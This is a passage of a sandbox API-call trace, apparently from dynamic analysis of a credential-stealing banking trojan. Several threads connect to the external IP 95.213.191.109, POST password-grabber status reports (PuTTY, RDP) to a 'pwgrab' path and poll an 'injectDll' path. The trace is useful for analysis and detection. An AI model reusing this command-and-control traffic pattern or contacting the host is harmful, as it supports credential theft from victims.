	[0235.141] WinHttpQueryHeaders (in: hRequest=0x27c7920, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x35ef218, lpdwBufferLength=0x35ef214, lpdwIndex=0x0 | out: lpBuffer=0x35ef218*, lpdwBufferLength=0x35ef214*=0x4, lpdwIndex=0x0) returned 1
	[0235.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27beff0) returned 1
	[0235.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b76e0) returned 1
	[0235.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b75a8) returned 1
	[0235.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27beeb0) returned 1
	[0235.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311c60) returned 1
	[0235.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2773650) returned 1
	[0235.141] Sleep (dwMilliseconds=0xbb8) 
	[0238.384] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27383d0) returned 1
	[0238.385] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff9c0) returned 1
	[0238.385] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c71e8) returned 1
	[0238.385] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738470) returned 1
	[0238.385] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738420) returned 1
	[0238.385] WinHttpCloseHandle (hInternet=0x27c7920) returned 1
	[0238.385] WinHttpCloseHandle (hInternet=0x22c5d28) returned 1
	[0238.385] WinHttpCloseHandle (hInternet=0x22c5c40) returned 1
	[0238.385] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bef50) returned 1

Thread:
	id = 334
	os_tid = 0xd94

	[0234.635] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5988
	[0234.635] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.635] WinHttpConnect (hSession=0x22c5988, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5a70
	[0234.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf2c0
	[0234.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PuTTY passwords are empty", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26
	[0234.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf2e8
	[0234.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PuTTY passwords are empty", cchWideChar=-1, lpMultiByteStr=0x27bf2e8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PuTTY passwords are empty", lpUsedDefaultChar=0x0) returned 26
	[0234.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf310
	[0234.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7530
	[0234.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7b48
	[0234.636] GetTickCount () returned 0xa90c23
	[0234.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311d68
	[0234.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x2773780
	[0234.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x36eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0234.636] WinHttpSetTimeouts (hInternet=0x22c5988, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0234.636] WinHttpOpenRequest (hConnect=0x22c5a70, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27c7fb8
	[0234.636] WinHttpSetOption (hInternet=0x27c7fb8, dwOption=0x1f, lpBuffer=0x36ef228, dwBufferLength=0x4) returned 1
	[0234.636] WinHttpSendRequest (hRequest=0x27c7fb8, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BBB4A3\r\nContent-Length: 130\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x2773780*, dwOptionalLength=0x82, dwTotalLength=0x82, dwContext=0x0) returned 1
	[0235.157] WinHttpReceiveResponse (hRequest=0x27c7fb8, lpReserved=0x0) returned 1
	[0235.157] WinHttpQueryHeaders (in: hRequest=0x27c7fb8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x36ef218, lpdwBufferLength=0x36ef214, lpdwIndex=0x0 | out: lpBuffer=0x36ef218*, lpdwBufferLength=0x36ef214*=0x4, lpdwIndex=0x0) returned 1
	[0235.157] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf310) returned 1
	[0235.157] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7530) returned 1
	[0235.157] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7b48) returned 1
	[0235.157] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf2e8) returned 1
	[0235.157] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311d68) returned 1
	[0235.158] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2773780) returned 1
	[0235.158] Sleep (dwMilliseconds=0xbb8) 
	[0238.401] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2738010) returned 1
	[0238.401] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff9f0) returned 1
	[0238.401] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7308) returned 1
	[0238.401] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fe8) returned 1
	[0238.401] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737fc0) returned 1
	[0238.401] WinHttpCloseHandle (hInternet=0x27c7fb8) returned 1
	[0238.401] WinHttpCloseHandle (hInternet=0x22c5a70) returned 1
	[0238.401] WinHttpCloseHandle (hInternet=0x22c5988) returned 1
	[0238.401] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf2c0) returned 1

Thread:
	id = 335
	os_tid = 0xd9c

	[0234.672] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5b58
	[0234.672] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0234.672] WinHttpConnect (hSession=0x22c5b58, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c61b0
	[0234.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf658
	[0234.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RDP passwords are empty", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24
	[0234.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf680
	[0234.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RDP passwords are empty", cchWideChar=-1, lpMultiByteStr=0x27bf680, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDP passwords are empty", lpUsedDefaultChar=0x0) returned 24
	[0234.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf6a8
	[0234.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7c68
	[0234.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7c80
	[0234.673] GetTickCount () returned 0xa90c52
	[0234.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311e70
	[0234.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x27738b0
	[0234.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x37eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0234.673] WinHttpSetTimeouts (hInternet=0x22c5b58, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0234.673] WinHttpOpenRequest (hConnect=0x22c61b0, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/pwgrab/DPST/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27d5280
	[0234.673] WinHttpSetOption (hInternet=0x27d5280, dwOption=0x1f, lpBuffer=0x37ef228, dwBufferLength=0x4) returned 1
	[0234.673] WinHttpSendRequest (hRequest=0x27d5280, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BBB4D2\r\nContent-Length: 128\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x27738b0*, dwOptionalLength=0x80, dwTotalLength=0x80, dwContext=0x0) returned 1
	[0236.716] WinHttpReceiveResponse (hRequest=0x27d5280, lpReserved=0x0) returned 1
	[0236.716] WinHttpQueryHeaders (in: hRequest=0x27d5280, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x37ef218, lpdwBufferLength=0x37ef214, lpdwIndex=0x0 | out: lpBuffer=0x37ef218*, lpdwBufferLength=0x37ef214*=0x4, lpdwIndex=0x0) returned 1
	[0236.716] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf6a8) returned 1
	[0236.716] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7c68) returned 1
	[0236.716] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7c80) returned 1
	[0236.716] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.716] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311e70) returned 1
	[0236.716] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27738b0) returned 1
	[0236.716] Sleep (dwMilliseconds=0xbb8) 
	[0239.773] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ef8) returned 1
	[0239.773] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b75c0) returned 1
	[0239.773] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6f18) returned 1
	[0239.773] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737b88) returned 1
	[0239.773] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737e30) returned 1
	[0239.773] WinHttpCloseHandle (hInternet=0x27d5280) returned 1
	[0239.774] WinHttpCloseHandle (hInternet=0x22c61b0) returned 1
	[0239.774] WinHttpCloseHandle (hInternet=0x22c5b58) returned 1
	[0239.774] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf658) returned 1

Thread:
	id = 336
	os_tid = 0x8ec

	[0234.684] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6298
	[0234.684] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0234.685] WinHttpConnect (hSession=0x22c6298, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c6380
	[0234.685] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfa90
	[0234.685] WinHttpSetTimeouts (hInternet=0x22c6298, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0234.685] WinHttpOpenRequest (hConnect=0x22c6380, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27dcfa8
	[0234.686] WinHttpSetOption (hInternet=0x27dcfa8, dwOption=0x1f, lpBuffer=0x38ef234, dwBufferLength=0x4) returned 1
	[0234.686] WinHttpSendRequest (hRequest=0x27dcfa8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0236.267] WinHttpReceiveResponse (hRequest=0x27dcfa8, lpReserved=0x0) returned 1
	[0236.268] WinHttpQueryHeaders (in: hRequest=0x27dcfa8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x38ef224, lpdwBufferLength=0x38ef220, lpdwIndex=0x0 | out: lpBuffer=0x38ef224*, lpdwBufferLength=0x38ef220*=0x4, lpdwIndex=0x0) returned 1
	[0236.268] Sleep (dwMilliseconds=0xbb8) 
	[0239.368] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf568) returned 1
	[0239.368] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7c08) returned 1
	[0239.368] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf540) returned 1
	[0239.368] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf518) returned 1
	[0239.368] WinHttpCloseHandle (hInternet=0x27dcfa8) returned 1
	[0239.368] WinHttpCloseHandle (hInternet=0x22c6380) returned 1
	[0239.368] WinHttpCloseHandle (hInternet=0x22c6298) returned 1
	[0239.368] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfa90) returned 1

Thread:
	id = 337
	os_tid = 0xbf0

	[0235.265] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6468
	[0235.265] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0235.265] WinHttpConnect (hSession=0x22c6468, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c6550
	[0235.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bff18
	[0235.265] WinHttpSetTimeouts (hInternet=0x22c6468, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0235.265] WinHttpOpenRequest (hConnect=0x22c6550, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27ec4c8
	[0235.265] WinHttpSetOption (hInternet=0x27ec4c8, dwOption=0x1f, lpBuffer=0x39ef234, dwBufferLength=0x4) returned 1
	[0235.265] WinHttpSendRequest (hRequest=0x27ec4c8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0236.003] WinHttpReceiveResponse (hRequest=0x27ec4c8, lpReserved=0x0) returned 1
	[0236.004] WinHttpQueryHeaders (in: hRequest=0x27ec4c8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x39ef224, lpdwBufferLength=0x39ef220, lpdwIndex=0x0 | out: lpBuffer=0x39ef224*, lpdwBufferLength=0x39ef220*=0x4, lpdwIndex=0x0) returned 1
	[0236.004] Sleep (dwMilliseconds=0xbb8) 
	[0239.009] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27beeb0) returned 1
	[0239.009] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7b48) returned 1
	[0239.009] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf310) returned 1
	[0239.009] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf2e8) returned 1
	[0239.009] WinHttpCloseHandle (hInternet=0x27ec4c8) returned 1
	[0239.009] WinHttpCloseHandle (hInternet=0x22c6550) returned 1
	[0239.009] WinHttpCloseHandle (hInternet=0x22c6468) returned 1
	[0239.009] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1

Thread:
	id = 338
	os_tid = 0xbec

	[0236.092] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c68f0
	[0236.093] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0236.093] WinHttpConnect (hSession=0x22c68f0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c69d8
	[0236.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c03c8
	[0236.093] WinHttpSetTimeouts (hInternet=0x22c68f0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0236.093] WinHttpOpenRequest (hConnect=0x22c69d8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e76c0
	[0236.093] WinHttpSetOption (hInternet=0x27e76c0, dwOption=0x1f, lpBuffer=0x3aef234, dwBufferLength=0x4) returned 1
	[0236.093] WinHttpSendRequest (hRequest=0x27e76c0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0236.587] WinHttpReceiveResponse (hRequest=0x27e76c0, lpReserved=0x0) returned 1
	[0236.587] WinHttpQueryHeaders (in: hRequest=0x27e76c0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x3aef224, lpdwBufferLength=0x3aef220, lpdwIndex=0x0 | out: lpBuffer=0x3aef224*, lpdwBufferLength=0x3aef220*=0x4, lpdwIndex=0x0) returned 1
	[0236.587] Sleep (dwMilliseconds=0xbb8) 
	[0239.589] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c02d8) returned 1
	[0239.589] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.589] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c02b0) returned 1
	[0239.589] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0239.589] WinHttpCloseHandle (hInternet=0x27e76c0) returned 1
	[0239.589] WinHttpCloseHandle (hInternet=0x22c69d8) returned 1
	[0239.589] WinHttpCloseHandle (hInternet=0x22c68f0) returned 1
	[0239.589] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c03c8) returned 1

Thread:
	id = 339
	os_tid = 0xbe8

	[0236.648] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6ac0
	[0236.648] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0236.648] WinHttpConnect (hSession=0x22c6ac0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c6ba8
	[0236.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0648
	[0236.648] WinHttpSetTimeouts (hInternet=0x22c6ac0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0236.648] WinHttpOpenRequest (hConnect=0x22c6ba8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0236.649] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x3bef234, dwBufferLength=0x4) returned 1
	[0236.649] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0236.997] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0236.997] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x3bef224, lpdwBufferLength=0x3bef220, lpdwIndex=0x0 | out: lpBuffer=0x3bef224*, lpdwBufferLength=0x3bef220*=0x4, lpdwIndex=0x0) returned 1
	[0236.997] Sleep (dwMilliseconds=0xbb8) 
	[0240.079] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0558) returned 1
	[0240.079] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1720) returned 1
	[0240.079] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0240.079] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0240.079] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0240.079] WinHttpCloseHandle (hInternet=0x22c6ba8) returned 1
	[0240.079] WinHttpCloseHandle (hInternet=0x22c6ac0) returned 1
	[0240.080] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0648) returned 1

Thread:
	id = 340
	os_tid = 0xbdc

	[0237.138] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2804430
	[0237.138] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0237.138] WinHttpConnect (hSession=0x2804430, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x2804518
	[0237.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0878
	[0237.138] WinHttpSetTimeouts (hInternet=0x2804430, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0237.139] WinHttpOpenRequest (hConnect=0x2804518, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7c10
	[0237.139] WinHttpSetOption (hInternet=0x27e7c10, dwOption=0x1f, lpBuffer=0x3cef234, dwBufferLength=0x4) returned 1
	[0237.139] WinHttpSendRequest (hRequest=0x27e7c10, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0238.195] WinHttpReceiveResponse (hRequest=0x27e7c10, lpReserved=0x0) returned 1
	[0238.195] WinHttpQueryHeaders (in: hRequest=0x27e7c10, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x3cef224, lpdwBufferLength=0x3cef220, lpdwIndex=0x0 | out: lpBuffer=0x3cef224*, lpdwBufferLength=0x3cef220*=0x4, lpdwIndex=0x0) returned 1
	[0238.195] Sleep (dwMilliseconds=0xbb8) 
	[0241.208] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0788) returned 1
	[0241.208] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7c68) returned 1
	[0241.208] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf6a8) returned 1
	[0241.209] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0241.209] WinHttpCloseHandle (hInternet=0x27e7c10) returned 1
	[0241.209] WinHttpCloseHandle (hInternet=0x2804518) returned 1
	[0241.209] WinHttpCloseHandle (hInternet=0x2804430) returned 1
	[0241.209] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1

Thread:
	id = 342
	os_tid = 0xdf8

	[0237.699] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5e10
	[0237.700] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0237.700] WinHttpConnect (hSession=0x22c5e10, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5ef8
	[0237.700] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b18
	[0237.700] WinHttpSetTimeouts (hInternet=0x22c5e10, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0237.700] WinHttpOpenRequest (hConnect=0x22c5ef8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7eb8
	[0237.702] WinHttpSetOption (hInternet=0x27e7eb8, dwOption=0x1f, lpBuffer=0x2d8f234, dwBufferLength=0x4) returned 1
	[0237.702] WinHttpSendRequest (hRequest=0x27e7eb8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0238.481] WinHttpReceiveResponse (hRequest=0x27e7eb8, lpReserved=0x0) returned 1
	[0238.482] WinHttpQueryHeaders (in: hRequest=0x27e7eb8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2d8f224, lpdwBufferLength=0x2d8f220, lpdwIndex=0x0 | out: lpBuffer=0x2d8f224*, lpdwBufferLength=0x2d8f220*=0x4, lpdwIndex=0x0) returned 1
	[0238.482] Sleep (dwMilliseconds=0xbb8) 
	[0241.520] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0241.520] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b76c8) returned 1
	[0241.520] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0241.520] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0241.520] WinHttpCloseHandle (hInternet=0x27e7eb8) returned 1
	[0241.520] WinHttpCloseHandle (hInternet=0x22c5ef8) returned 1
	[0241.520] WinHttpCloseHandle (hInternet=0x22c5e10) returned 1
	[0241.520] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b18) returned 1

Thread:
	id = 343
	os_tid = 0xba0

